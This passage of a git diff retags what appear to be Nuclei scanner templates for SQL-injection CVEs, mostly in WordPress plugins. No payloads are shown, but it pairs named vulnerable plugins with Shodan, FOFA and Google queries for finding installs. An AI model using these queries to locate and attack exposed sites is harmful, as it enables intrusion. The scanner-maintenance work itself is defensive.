+++ b/http/cves/2021/CVE-2021-24791.yaml @@ -26,7 +26,7 @@ info: product: header_footer_code_manager framework: wordpress google-query: inurl:"/wp-content/plugins/wp-custom-pages/" - tags: time-based,cve2021,cve,wpscan,sqli,wp,wordpress,wp-plugin,authenticated,header-footer-code-manager,draftpress + tags: time-based-sqli,cve2021,cve,wpscan,sqli,wp,wordpress,wp-plugin,authenticated,header-footer-code-manager,draftpress http: - raw: diff --git a/http/cves/2021/CVE-2021-24827.yaml b/http/cves/2021/CVE-2021-24827.yaml index fde59625e3..8f76f4e871 100644 --- a/http/cves/2021/CVE-2021-24827.yaml +++ b/http/cves/2021/CVE-2021-24827.yaml @@ -30,7 +30,7 @@ info: vendor: asgaros product: asgaros_forum framework: wordpress - tags: time-based,cve2021,cve,wp-plugin,asgaros-forum,unauth,wpscan,wordpress,wp,sqli,asgaros + tags: time-based-sqli,cve2021,cve,wp-plugin,asgaros-forum,unauth,wpscan,wordpress,wp,sqli,asgaros http: - raw: diff --git a/http/cves/2021/CVE-2021-24849.yaml b/http/cves/2021/CVE-2021-24849.yaml index 2d72a46c4c..7fb3d40998 100644 --- a/http/cves/2021/CVE-2021-24849.yaml +++ b/http/cves/2021/CVE-2021-24849.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/wc-multivendor-marketplace fofa-query: body=/wp-content/plugins/wc-multivendor-marketplace publicwww-query: "/wp-content/plugins/wc-multivendor-marketplace" - tags: time-based,wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,sqli,wclovers + tags: time-based-sqli,wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,sqli,wclovers flow: http(1) && http(2) http: diff --git a/http/cves/2021/CVE-2021-24862.yaml b/http/cves/2021/CVE-2021-24862.yaml index ba6db346e0..ba2aca3af6 100644 --- a/http/cves/2021/CVE-2021-24862.yaml +++ b/http/cves/2021/CVE-2021-24862.yaml @@ -29,7 +29,7 @@ info: vendor: metagauss product: registrationmagic framework: wordpress - tags: time-based,cve,cve2021,wpscan,wp-plugin,wordpress,wp,registrationmagic,sqli,authenticated,packetstorm,metagauss + tags: time-based-sqli,cve,cve2021,wpscan,wp-plugin,wordpress,wp,registrationmagic,sqli,authenticated,packetstorm,metagauss http: - raw: diff --git a/http/cves/2021/CVE-2021-24931.yaml b/http/cves/2021/CVE-2021-24931.yaml index 819d02cb85..68906246e1 100644 --- a/http/cves/2021/CVE-2021-24931.yaml +++ b/http/cves/2021/CVE-2021-24931.yaml @@ -28,7 +28,7 @@ info: vendor: ays-pro product: secure_copy_content_protection_and_content_locking framework: wordpress - tags: time-based,cve2021,cve,wp-plugin,wp,packetstorm,unauth,wpscan,sqli,wordpress,secure-copy-content-protection,ays-pro + tags: time-based-sqli,cve2021,cve,wp-plugin,wp,packetstorm,unauth,wpscan,sqli,wordpress,secure-copy-content-protection,ays-pro http: - raw: diff --git a/http/cves/2021/CVE-2021-24943.yaml b/http/cves/2021/CVE-2021-24943.yaml index ad8b050d79..16d75723d3 100644 --- a/http/cves/2021/CVE-2021-24943.yaml +++ b/http/cves/2021/CVE-2021-24943.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/registrations-for-the-events-calendar/ fofa-query: body=/wp-content/plugins/registrations-for-the-events-calendar/ publicwww-query: "/wp-content/plugins/registrations-for-the-events-calendar/" - tags: time-based,wpscan,cve,cve2021,wp,wp-plugin,wordpress,sqli,registrations-for-the-events-calendar,roundupwp + tags: time-based-sqli,wpscan,cve,cve2021,wp,wp-plugin,wordpress,sqli,registrations-for-the-events-calendar,roundupwp variables: text: "{{rand_base(5)}}" diff --git a/http/cves/2021/CVE-2021-24946.yaml b/http/cves/2021/CVE-2021-24946.yaml index d7b6faaf85..59727388a7 100644 --- a/http/cves/2021/CVE-2021-24946.yaml +++ b/http/cves/2021/CVE-2021-24946.yaml @@ -30,7 +30,7 @@ info: vendor: webnus product: modern_events_calendar_lite framework: wordpress - tags: time-based,cve2021,cve,sqli,packetstorm,wp,wp-plugin,unauth,wpscan,modern-events-calendar-lite,wordpress,webnus + tags: time-based-sqli,cve2021,cve,sqli,packetstorm,wp,wp-plugin,unauth,wpscan,modern-events-calendar-lite,wordpress,webnus http: - raw: diff --git a/http/cves/2021/CVE-2021-25114.yaml b/http/cves/2021/CVE-2021-25114.yaml index b36b3d3c3a..9e12f13a1e 100644 --- a/http/cves/2021/CVE-2021-25114.yaml +++ b/http/cves/2021/CVE-2021-25114.yaml @@ -34,7 +34,7 @@ info: fofa-query: body=/wp-content/plugins/paid-memberships-pro/ publicwww-query: /wp-content/plugins/paid-memberships-pro/ google-query: inurl:"/wp-content/plugins/paid-memberships-pro" - tags: time-based,cve2021,cve,wp-plugin,wp,sqli,paid-memberships-pro,wpscan,wordpress,strangerstudios + tags: time-based-sqli,cve2021,cve,wp-plugin,wp,sqli,paid-memberships-pro,wpscan,wordpress,strangerstudios http: - raw: diff --git a/http/cves/2021/CVE-2021-25899.yaml b/http/cves/2021/CVE-2021-25899.yaml index 8c5121af45..b1de16854f 100644 --- a/http/cves/2021/CVE-2021-25899.yaml +++ b/http/cves/2021/CVE-2021-25899.yaml @@ -31,7 +31,7 @@ info: - html:"AURALL" - http.html:"aurall" fofa-query: body="aurall" - tags: time-based,cve2021,cve,sqli,void,aurall + tags: time-based-sqli,cve2021,cve,sqli,void,aurall http: - raw: diff --git a/http/cves/2021/CVE-2021-27314.yaml b/http/cves/2021/CVE-2021-27314.yaml index 97ff095d00..4f1f4a65e8 100644 --- a/http/cves/2021/CVE-2021-27314.yaml +++ b/http/cves/2021/CVE-2021-27314.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: doctor_appointment_system_project product: doctor_appointment_system - tags: time-based,cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project + tags: time-based-sqli,cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project http: - raw: diff --git a/http/cves/2021/CVE-2021-27315.yaml b/http/cves/2021/CVE-2021-27315.yaml index 3ae5a8dde8..87ea96e55a 100644 --- a/http/cves/2021/CVE-2021-27315.yaml +++ b/http/cves/2021/CVE-2021-27315.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: doctor_appointment_system_project product: doctor_appointment_system - tags: time-based,cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project + tags: time-based-sqli,cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project http: - raw: diff --git a/http/cves/2021/CVE-2021-27316.yaml b/http/cves/2021/CVE-2021-27316.yaml index 3d52672e27..c080e0ba9b 100644 --- a/http/cves/2021/CVE-2021-27316.yaml +++ b/http/cves/2021/CVE-2021-27316.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: doctor_appointment_system_project product: doctor_appointment_system - tags: time-based,cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project + tags: time-based-sqli,cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project http: - raw: diff --git a/http/cves/2021/CVE-2021-27319.yaml b/http/cves/2021/CVE-2021-27319.yaml index 22fb0694ab..7e032e4ae8 100644 --- a/http/cves/2021/CVE-2021-27319.yaml +++ b/http/cves/2021/CVE-2021-27319.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: doctor_appointment_system_project product: doctor_appointment_system - tags: time-based,cve2021,cve,packetstorm,sqli,doctor-appointment-system,doctor_appointment_system_project + tags: time-based-sqli,cve2021,cve,packetstorm,sqli,doctor-appointment-system,doctor_appointment_system_project http: - raw: diff --git a/http/cves/2021/CVE-2021-27320.yaml b/http/cves/2021/CVE-2021-27320.yaml index e1e8dc5737..c0543597ca 100644 --- a/http/cves/2021/CVE-2021-27320.yaml +++ b/http/cves/2021/CVE-2021-27320.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: doctor_appointment_system_project product: doctor_appointment_system - tags: time-based,cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project + tags: time-based-sqli,cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project http: - raw: diff --git a/http/cves/2021/CVE-2021-3110.yaml b/http/cves/2021/CVE-2021-3110.yaml index fff87abf57..d190e3056e 100644 --- a/http/cves/2021/CVE-2021-3110.yaml +++ b/http/cves/2021/CVE-2021-3110.yaml @@ -30,7 +30,7 @@ info: vendor: prestashop product: prestashop shodan-query: cpe:"cpe:2.3:a:prestashop:prestashop" - tags: time-based,cve,cve2021,sqli,prestshop,edb,prestashop + tags: time-based-sqli,cve,cve2021,sqli,prestshop,edb,prestashop http: - raw: diff --git a/http/cves/2021/CVE-2021-39165.yaml b/http/cves/2021/CVE-2021-39165.yaml index b4c8ed01e2..5532be45c6 100644 --- a/http/cves/2021/CVE-2021-39165.yaml +++ b/http/cves/2021/CVE-2021-39165.yaml @@ -31,7 +31,7 @@ info: product: cachet shodan-query: http.favicon.hash:-1606065523 fofa-query: icon_hash=-1606065523 - tags: time-based,cve,cve2021,cachet,sqli,chachethq + tags: time-based-sqli,cve,cve2021,cachet,sqli,chachethq http: - raw: diff --git a/http/cves/2022/CVE-2022-0228.yaml b/http/cves/2022/CVE-2022-0228.yaml index f3d606df33..d245f39b89 100644 --- a/http/cves/2022/CVE-2022-0228.yaml +++ b/http/cves/2022/CVE-2022-0228.yaml @@ -29,7 +29,7 @@ info: shodan-query: http.html:/wp-content/plugins/popup-builder/ fofa-query: body=/wp-content/plugins/popup-builder/ publicwww-query: /wp-content/plugins/popup-builder/ - tags: time-based,cve2022,cve,wordpress,wp-plugin,wp,wpscan,popup-builder,sygnoos,sqli + tags: time-based-sqli,cve2022,cve,wordpress,wp-plugin,wp,wpscan,popup-builder,sygnoos,sqli http: - raw: diff --git a/http/cves/2022/CVE-2022-0349.yaml b/http/cves/2022/CVE-2022-0349.yaml index 746c28c42d..97f247925e 100644 --- a/http/cves/2022/CVE-2022-0349.yaml +++ b/http/cves/2022/CVE-2022-0349.yaml @@ -30,7 +30,7 @@ info: vendor: wpdeveloper product: notificationx framework: wordpress - tags: time-based,cve,cve2022,wordpress,wp-plugin,wp,sqli,notificationx,wpscan,wpdeveloper + tags: time-based-sqli,cve,cve2022,wordpress,wp-plugin,wp,sqli,notificationx,wpscan,wpdeveloper http: - raw: diff --git a/http/cves/2022/CVE-2022-0412.yaml b/http/cves/2022/CVE-2022-0412.yaml index e6534841d9..1e8e887378 100644 --- a/http/cves/2022/CVE-2022-0412.yaml +++ b/http/cves/2022/CVE-2022-0412.yaml @@ -30,7 +30,7 @@ info: vendor: templateinvaders product: ti_woocommerce_wishlist framework: wordpress - tags: time-based,cve2022,cve,sqli,ti-woocommerce-wishlist,wpscan,woocommerce,wordpress,wp-plugin,wp,templateinvaders + tags: time-based-sqli,cve2022,cve,sqli,ti-woocommerce-wishlist,wpscan,woocommerce,wordpress,wp-plugin,wp,templateinvaders http: - raw: diff --git a/http/cves/2022/CVE-2022-0651.yaml b/http/cves/2022/CVE-2022-0651.yaml index ee05a34997..65db5bbdbb 100644 --- a/http/cves/2022/CVE-2022-0651.yaml +++ b/http/cves/2022/CVE-2022-0651.yaml @@ -31,7 +31,7 @@ info: fofa-query: body=/wp-content/plugins/wp-statistics/ publicwww-query: /wp-content/plugins/wp-statistics/ google-query: inurl:/wp-content/plugins/wp-statistics - tags: time-based,cve,cve2022,sqli,wp,wordpress,wp-plugin,wp-statistics,veronalabs + tags: time-based-sqli,cve,cve2022,sqli,wp,wordpress,wp-plugin,wp-statistics,veronalabs http: - raw: diff --git a/http/cves/2022/CVE-2022-0658.yaml b/http/cves/2022/CVE-2022-0658.yaml index b714517af1..64e36e0d4b 100644 --- a/http/cves/2022/CVE-2022-0658.yaml +++ b/http/cves/2022/CVE-2022-0658.yaml @@ -27,7 +27,7 @@ info: product: commonsbooking framework: wordpress google-query: inurl:/wp-content/plugin/commonsbooking/ - tags: time-based,cve,cve2022,wordpress,wp-plugin,wp,commonsbooking,sqli,wpscan,wielebenwir + tags: time-based-sqli,cve,cve2022,wordpress,wp-plugin,wp,commonsbooking,sqli,wpscan,wielebenwir http: - raw: diff --git a/http/cves/2022/CVE-2022-0693.yaml b/http/cves/2022/CVE-2022-0693.yaml index c3bf42b592..5238432c35 100644 --- a/http/cves/2022/CVE-2022-0693.yaml +++ b/http/cves/2022/CVE-2022-0693.yaml @@ -30,7 +30,7 @@ info: vendor: devbunch product: master_elements framework: wordpress - tags: time-based,cve2022,cve,unauth,wpscan,wp-plugin,wp,sqli,wordpress,master-elements,devbunch + tags: time-based-sqli,cve2022,cve,unauth,wpscan,wp-plugin,wp,sqli,wordpress,master-elements,devbunch http: - raw: diff --git a/http/cves/2022/CVE-2022-0747.yaml b/http/cves/2022/CVE-2022-0747.yaml index 04f54f4175..eea10a4bfd 100644 --- a/http/cves/2022/CVE-2022-0747.yaml +++ b/http/cves/2022/CVE-2022-0747.yaml @@ -29,7 +29,7 @@ info: vendor: quantumcloud product: infographic_maker framework: wordpress - tags: time-based,cve,cve2022,sqli,wordpress,wp-plugin,wp,infographic-and-list-builder-ilist,wpscan,quantumcloud + tags: time-based-sqli,cve,cve2022,sqli,wordpress,wp-plugin,wp,infographic-and-list-builder-ilist,wpscan,quantumcloud http: - raw: diff --git a/http/cves/2022/CVE-2022-0760.yaml b/http/cves/2022/CVE-2022-0760.yaml index 3ea68cc374..866e47810e 100644 --- a/http/cves/2022/CVE-2022-0760.yaml +++ b/http/cves/2022/CVE-2022-0760.yaml @@ -30,7 +30,7 @@ info: vendor: quantumcloud product: simple_link_directory framework: wordpress - tags: time-based,cve,cve2022,sqli,wordpress,wp-plugin,wp,simple-link-directory,unauth,wpscan,quantumcloud + tags: time-based-sqli,cve,cve2022,sqli,wordpress,wp-plugin,wp,simple-link-directory,unauth,wpscan,quantumcloud http: - raw: diff --git a/http/cves/2022/CVE-2022-0769.yaml b/http/cves/2022/CVE-2022-0769.yaml index 122e57dc11..7cec3a1707 100644 --- a/http/cves/2022/CVE-2022-0769.yaml +++ b/http/cves/2022/CVE-2022-0769.yaml @@ -30,7 +30,7 @@ info: vendor: usersultra product: users_ultra framework: wordpress - tags: time-based,cve,cve2022,wp,users-ultra,wpscan,sqli,wordpress,wp-plugin,usersultra + tags: time-based-sqli,cve,cve2022,wp,users-ultra,wpscan,sqli,wordpress,wp-plugin,usersultra http: - raw: diff --git a/http/cves/2022/CVE-2022-0773.yaml b/http/cves/2022/CVE-2022-0773.yaml index dac85971a4..24d85d83be 100644 --- a/http/cves/2022/CVE-2022-0773.yaml +++ b/http/cves/2022/CVE-2022-0773.yaml @@ -28,7 +28,7 @@ info: vendor: documentor_project product: documentor framework: wordpress - tags: time-based,cve2022,cve,unauth,sqli,wp-plugin,wp,documentor-lite,wpscan,wordpress,documentor_project + tags: time-based-sqli,cve2022,cve,unauth,sqli,wp-plugin,wp,documentor-lite,wpscan,wordpress,documentor_project http: - raw: diff --git a/http/cves/2022/CVE-2022-0784.yaml b/http/cves/2022/CVE-2022-0784.yaml index a126d03354..1cc12bce2d 100644 --- a/http/cves/2022/CVE-2022-0784.yaml +++ b/http/cves/2022/CVE-2022-0784.yaml @@ -30,7 +30,7 @@ info: vendor: title_experiments_free_project product: title_experiments_free framework: wordpress - tags: time-based,cve2022,cve,wpscan,wp-plugin,wp,sqli,wp-experiments-free,unauth,wordpress,title_experiments_free_project + tags: time-based-sqli,cve2022,cve,wpscan,wp-plugin,wp,sqli,wp-experiments-free,unauth,wordpress,title_experiments_free_project http: - raw: diff --git a/http/cves/2022/CVE-2022-0785.yaml b/http/cves/2022/CVE-2022-0785.yaml index 1ea38cad7e..6224663c84 100644 --- a/http/cves/2022/CVE-2022-0785.yaml +++ b/http/cves/2022/CVE-2022-0785.yaml @@ -30,7 +30,7 @@ info: vendor: daily_prayer_time_project product: daily_prayer_time framework: wordpress - tags: time-based,cve2022,cve,sqli,wordpress,wp-plugin,unauth,daily-prayer-time-for-mosques,wpscan,wp,daily_prayer_time_project + tags: time-based-sqli,cve2022,cve,sqli,wordpress,wp-plugin,unauth,daily-prayer-time-for-mosques,wpscan,wp,daily_prayer_time_project http: - raw: diff --git a/http/cves/2022/CVE-2022-0786.yaml b/http/cves/2022/CVE-2022-0786.yaml index 3ac92d8cc3..2d6abb3f5d 100644 --- a/http/cves/2022/CVE-2022-0786.yaml +++ b/http/cves/2022/CVE-2022-0786.yaml @@ -30,7 +30,7 @@ info: vendor: iqonic product: kivicare framework: wordpress - tags: time-based,cve,cve2022,sqli,kivicare-clinic-management-system,unauth,wordpress,wp-plugin,wp,wpscan,iqonic + tags: time-based-sqli,cve,cve2022,sqli,kivicare-clinic-management-system,unauth,wordpress,wp-plugin,wp,wpscan,iqonic http: - raw: diff --git a/http/cves/2022/CVE-2022-0787.yaml b/http/cves/2022/CVE-2022-0787.yaml index e34b703e26..0bc1632811 100644 --- a/http/cves/2022/CVE-2022-0787.yaml +++ b/http/cves/2022/CVE-2022-0787.yaml @@ -26,7 +26,7 @@ info: vendor: limit_login_attempts_project product: limit_login_attempts framework: wordpress - tags: time-based,cve,cve2022,wpscan,sqli,wordpress,wp-plugin,wp,wp-limit-failed-login-attempts,limit_login_attempts_project + tags: time-based-sqli,cve,cve2022,wpscan,sqli,wordpress,wp-plugin,wp,wp-limit-failed-login-attempts,limit_login_attempts_project http: - raw: diff --git a/http/cves/2022/CVE-2022-0788.yaml b/http/cves/2022/CVE-2022-0788.yaml index 1264ca0b5c..4c4842c703 100644 --- a/http/cves/2022/CVE-2022-0788.yaml +++ b/http/cves/2022/CVE-2022-0788.yaml @@ -30,7 +30,7 @@ info: vendor: wpmet product: wp_fundraising_donation_and_crowdfunding_platform framework: wordpress - tags: time-based,cve,cve2022,sqli,wordpress,wp-plugin,wp,wp-fundraising-donation,unauth,wpscan,wpmet + tags: time-based-sqli,cve,cve2022,sqli,wordpress,wp-plugin,wp,wp-fundraising-donation,unauth,wpscan,wpmet http: - raw: diff --git a/http/cves/2022/CVE-2022-0826.yaml b/http/cves/2022/CVE-2022-0826.yaml index 27db049a13..1a9c622c3b 100644 --- a/http/cves/2022/CVE-2022-0826.yaml +++ b/http/cves/2022/CVE-2022-0826.yaml @@ -30,7 +30,7 @@ info: vendor: wp-video-gallery-free_project product: wp-video-gallery-free framework: wordpress - tags: time-based,cve,cve2022,wp-plugin,wpscan,wordpress,wp,sqli,wp-video-gallery-free,unauth,wp-video-gallery-free_project + tags: time-based-sqli,cve,cve2022,wp-plugin,wpscan,wordpress,wp,sqli,wp-video-gallery-free,unauth,wp-video-gallery-free_project http: - raw: diff --git a/http/cves/2022/CVE-2022-0827.yaml b/http/cves/2022/CVE-2022-0827.yaml index 1167fc435d..6f49e12293 100644 --- a/http/cves/2022/CVE-2022-0827.yaml +++ b/http/cves/2022/CVE-2022-0827.yaml @@ -30,7 +30,7 @@ info: vendor: presspage product: bestbooks framework: wordpress - tags: time-based,cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,bestbooks,unauthenticated,presspage + tags: time-based-sqli,cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,bestbooks,unauthenticated,presspage http: - raw: diff --git a/http/cves/2022/CVE-2022-0846.yaml b/http/cves/2022/CVE-2022-0846.yaml index 9b5a838ab7..cf8477c1a8 100644 --- a/http/cves/2022/CVE-2022-0846.yaml +++ b/http/cves/2022/CVE-2022-0846.yaml @@ -29,7 +29,7 @@ info: vendor: speakout\!_email_petitions_project product: speakout\!_email_petitions framework: wordpress - tags: time-based,cve,cve2022,wordpress,wp-plugin,wp,unauth,wpscan,sqli,speakout,speakout-email-petitions,speakout\!_email_petitions_project + tags: time-based-sqli,cve,cve2022,wordpress,wp-plugin,wp,unauth,wpscan,sqli,speakout,speakout-email-petitions,speakout\!_email_petitions_project http: - raw: diff --git a/http/cves/2022/CVE-2022-0867.yaml b/http/cves/2022/CVE-2022-0867.yaml index a65f4a5701..5c9f4775e5 100644 --- a/http/cves/2022/CVE-2022-0867.yaml +++ b/http/cves/2022/CVE-2022-0867.yaml @@ -30,7 +30,7 @@ info: vendor: reputeinfosystems product: pricing_table framework: wordpress - tags: time-based,cve,cve2022,unauth,wp,wordpress,wp-plugin,arprice-responsive-pricing-table,sqli,wpscan,reputeinfosystems + tags: time-based-sqli,cve,cve2022,unauth,wp,wordpress,wp-plugin,arprice-responsive-pricing-table,sqli,wpscan,reputeinfosystems http: - raw: diff --git a/http/cves/2022/CVE-2022-0948.yaml b/http/cves/2022/CVE-2022-0948.yaml index e4fc9db00a..6774a235c0 100644 --- a/http/cves/2022/CVE-2022-0948.yaml +++ b/http/cves/2022/CVE-2022-0948.yaml @@ -30,7 +30,7 @@ info: vendor: pluginbazaar product: order_listener_for_woocommerce framework: wordpress - tags: time-based,cve,cve2022,wp,unauth,sqli,woc-order-alert,wpscan,wordpress,wp-plugin,pluginbazaar + tags: time-based-sqli,cve,cve2022,wp,unauth,sqli,woc-order-alert,wpscan,wordpress,wp-plugin,pluginbazaar http: - raw: diff --git a/http/cves/2022/CVE-2022-0949.yaml b/http/cves/2022/CVE-2022-0949.yaml index 591fc55360..797e4e70a2 100644 --- a/http/cves/2022/CVE-2022-0949.yaml +++ b/http/cves/2022/CVE-2022-0949.yaml @@ -29,7 +29,7 @@ info: vendor: stopbadbots product: block_and_stop_bad_bots framework: wordpress - tags: time-based,cve,cve2022,stopbadbots,wp-plugin,wp,unauth,wpscan,sqli,wordpress + tags: time-based-sqli,cve,cve2022,stopbadbots,wp-plugin,wp,unauth,wpscan,sqli,wordpress variables: IP: '{{rand_ip("1.1.1.0/24")}}' diff --git a/http/cves/2022/CVE-2022-1013.yaml b/http/cves/2022/CVE-2022-1013.yaml index 6ec84641ec..cbd5889df1 100644 --- a/http/cves/2022/CVE-2022-1013.yaml +++ b/http/cves/2022/CVE-2022-1013.yaml @@ -29,7 +29,7 @@ info: vendor: ays-pro product: personal_dictionary framework: wordpress - tags: time-based,cve,cve2022,wp,unauth,wpscan,sqli,wordpress,wp-plugin,personal-dictionary,ays-pro + tags: time-based-sqli,cve,cve2022,wp,unauth,wpscan,sqli,wordpress,wp-plugin,personal-dictionary,ays-pro http: - raw: diff --git a/http/cves/2022/CVE-2022-1057.yaml b/http/cves/2022/CVE-2022-1057.yaml index 1c58978fd4..37ce43aed4 100644 --- a/http/cves/2022/CVE-2022-1057.yaml +++ b/http/cves/2022/CVE-2022-1057.yaml @@ -30,7 +30,7 @@ info: vendor: varktech product: pricing_deals_for_woocommerce framework: wordpress - tags: time-based,cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,pricing-deals-for-woocommerce,unauth,varktech + tags: time-based-sqli,cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,pricing-deals-for-woocommerce,unauth,varktech http: - raw: diff --git a/http/cves/2022/CVE-2022-1768.yaml b/http/cves/2022/CVE-2022-1768.yaml index c07e4ef97f..e47277e55c 100644 --- a/http/cves/2022/CVE-2022-1768.yaml +++ b/http/cves/2022/CVE-2022-1768.yaml @@ -30,7 +30,7 @@ info: vendor: carrcommunications product: rsvpmaker framework: wordpress - tags: time-based,cve,cve2022,wordpress,wp-plugin,wp,sqli,rsvpmaker,carrcommunications + tags: time-based-sqli,cve,cve2022,wordpress,wp-plugin,wp,sqli,rsvpmaker,carrcommunications http: - raw: diff --git a/http/cves/2022/CVE-2022-1883.yaml b/http/cves/2022/CVE-2022-1883.yaml index 21846e5778..b8463f79b1 100644 --- a/http/cves/2022/CVE-2022-1883.yaml +++ b/http/cves/2022/CVE-2022-1883.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: camptocamp product: terraboard - tags: time-based,cve,cve2022,terraboard,sqli,huntr,camptocamp + tags: time-based-sqli,cve,cve2022,terraboard,sqli,huntr,camptocamp http: - raw: diff --git a/http/cves/2022/CVE-2022-22897.yaml b/http/cves/2022/CVE-2022-22897.yaml index 3da520ec18..24ffcd26d3 100644 --- a/http/cves/2022/CVE-2022-22897.yaml +++ b/http/cves/2022/CVE-2022-22897.yaml @@ -31,7 +31,7 @@ info: shodan-query: - "http.component:\"Prestashop\"" - http.component:"prestashop" - tags: time-based,cve,cve2022,packetstorm,prestashop,sqli,unauth,apollotheme + tags: time-based-sqli,cve,cve2022,packetstorm,prestashop,sqli,unauth,apollotheme http: - raw: diff --git a/http/cves/2022/CVE-2022-24223.yaml b/http/cves/2022/CVE-2022-24223.yaml index 8a6b4070e9..86cd020a3d 100644 --- a/http/cves/2022/CVE-2022-24223.yaml +++ b/http/cves/2022/CVE-2022-24223.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: thedigitalcraft product: atomcms - tags: time-based,cve,cve2022,packetstorm,sqli,atom,cms,thedigitalcraft + tags: time-based-sqli,cve,cve2022,packetstorm,sqli,atom,cms,thedigitalcraft http: - raw: diff --git a/http/cves/2022/CVE-2022-24265.yaml b/http/cves/2022/CVE-2022-24265.yaml index 04d0a672c1..9d44c2e1fa 100644 --- a/http/cves/2022/CVE-2022-24265.yaml +++ b/http/cves/2022/CVE-2022-24265.yaml @@ -29,7 +29,7 @@ info: max-request: 2 vendor: cuppacms product: cuppacms - tags: time-based,cve2022,cve,sqli,cuppa,authenticated,cuppacms + tags: time-based-sqli,cve2022,cve,sqli,cuppa,authenticated,cuppacms http: - raw: diff --git a/http/cves/2022/CVE-2022-24266.yaml b/http/cves/2022/CVE-2022-24266.yaml index 1ae7115add..1741b91789 100644 --- a/http/cves/2022/CVE-2022-24266.yaml +++ b/http/cves/2022/CVE-2022-24266.yaml @@ -29,7 +29,7 @@ info: max-request: 2 vendor: cuppacms product: cuppacms - tags: time-based,cve,cve2022,sqli,cuppa,authenticated,cuppacms + tags: time-based-sqli,cve,cve2022,sqli,cuppa,authenticated,cuppacms http: - raw: diff --git a/http/cves/2022/CVE-2022-2467.yaml b/http/cves/2022/CVE-2022-2467.yaml index 823773f984..516b94de3a 100644 --- a/http/cves/2022/CVE-2022-2467.yaml +++ b/http/cves/2022/CVE-2022-2467.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: garage_management_system_project product: garage_management_system - tags: time-based,cve,cve2022,sourcecodester,garagemanagementsystem,sqli,garage_management_system_project + tags: time-based-sqli,cve,cve2022,sourcecodester,garagemanagementsystem,sqli,garage_management_system_project http: - raw: diff --git a/http/cves/2022/CVE-2022-25148.yaml b/http/cves/2022/CVE-2022-25148.yaml index 10389dd1b5..8982866299 100644 --- a/http/cves/2022/CVE-2022-25148.yaml +++ b/http/cves/2022/CVE-2022-25148.yaml @@ -31,7 +31,7 @@ info: fofa-query: body=/wp-content/plugins/wp-statistics/ publicwww-query: /wp-content/plugins/wp-statistics/ google-query: inurl:/wp-content/plugins/wp-statistics - tags: time-based,cve,cve2022,packetstorm,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics,veronalabs + tags: time-based-sqli,cve,cve2022,packetstorm,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics,veronalabs http: - raw: diff --git a/http/cves/2022/CVE-2022-25149.yaml b/http/cves/2022/CVE-2022-25149.yaml index 1c279e67a5..011f16ecca 100644 --- a/http/cves/2022/CVE-2022-25149.yaml +++ b/http/cves/2022/CVE-2022-25149.yaml @@ -30,7 +30,7 @@ info: fofa-query: body=/wp-content/plugins/wp-statistics/ publicwww-query: "/wp-content/plugins/wp-statistics/" google-query: inurl:/wp-content/plugins/wp-statistics - tags: time-based,cve2022,cve,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics,veronalabs + tags: time-based-sqli,cve2022,cve,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics,veronalabs http: - raw: diff --git a/http/cves/2022/CVE-2022-27984.yaml b/http/cves/2022/CVE-2022-27984.yaml index 3f7f52f5df..b063c00671 100644 --- a/http/cves/2022/CVE-2022-27984.yaml +++ b/http/cves/2022/CVE-2022-27984.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: cuppacms product: cuppacms - tags: time-based,cve,cve2022,sqli,cuppa,authenticated,cuppacms + tags: time-based-sqli,cve,cve2022,sqli,cuppa,authenticated,cuppacms http: - raw: diff --git a/http/cves/2022/CVE-2022-28032.yaml b/http/cves/2022/CVE-2022-28032.yaml index 879e3277ac..81aa40426a 100644 --- a/http/cves/2022/CVE-2022-28032.yaml +++ b/http/cves/2022/CVE-2022-28032.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: thedigitalcraft product: atomcms - tags: time-based,cve,cve2022,sqli,atom,cms,thedigitalcraft + tags: time-based-sqli,cve,cve2022,sqli,atom,cms,thedigitalcraft http: - raw: diff --git a/http/cves/2022/CVE-2022-3142.yaml b/http/cves/2022/CVE-2022-3142.yaml index 9ecc5024f5..bf470e3c58 100644 --- a/http/cves/2022/CVE-2022-3142.yaml +++ b/http/cves/2022/CVE-2022-3142.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.html:/wp-content/plugins/nex-forms-express-wp-form-builder/ fofa-query: body=/wp-content/plugins/nex-forms-express-wp-form-builder/ publicwww-query: /wp-content/plugins/nex-forms-express-wp-form-builder/ - tags: time-based,cve,cve2022,wpscan,packetstorm,wordpress,sqli,wp-plugin,wp,authenticated,basixonline + tags: time-based-sqli,cve,cve2022,wpscan,packetstorm,wordpress,sqli,wp-plugin,wp,authenticated,basixonline http: - raw: diff --git a/http/cves/2022/CVE-2022-31499.yaml b/http/cves/2022/CVE-2022-31499.yaml index fbadaa25a8..e283dd0d3c 100644 --- a/http/cves/2022/CVE-2022-31499.yaml +++ b/http/cves/2022/CVE-2022-31499.yaml @@ -39,7 +39,7 @@ info: google-query: - intitle:"linear emerge" - intitle:"emerge" - 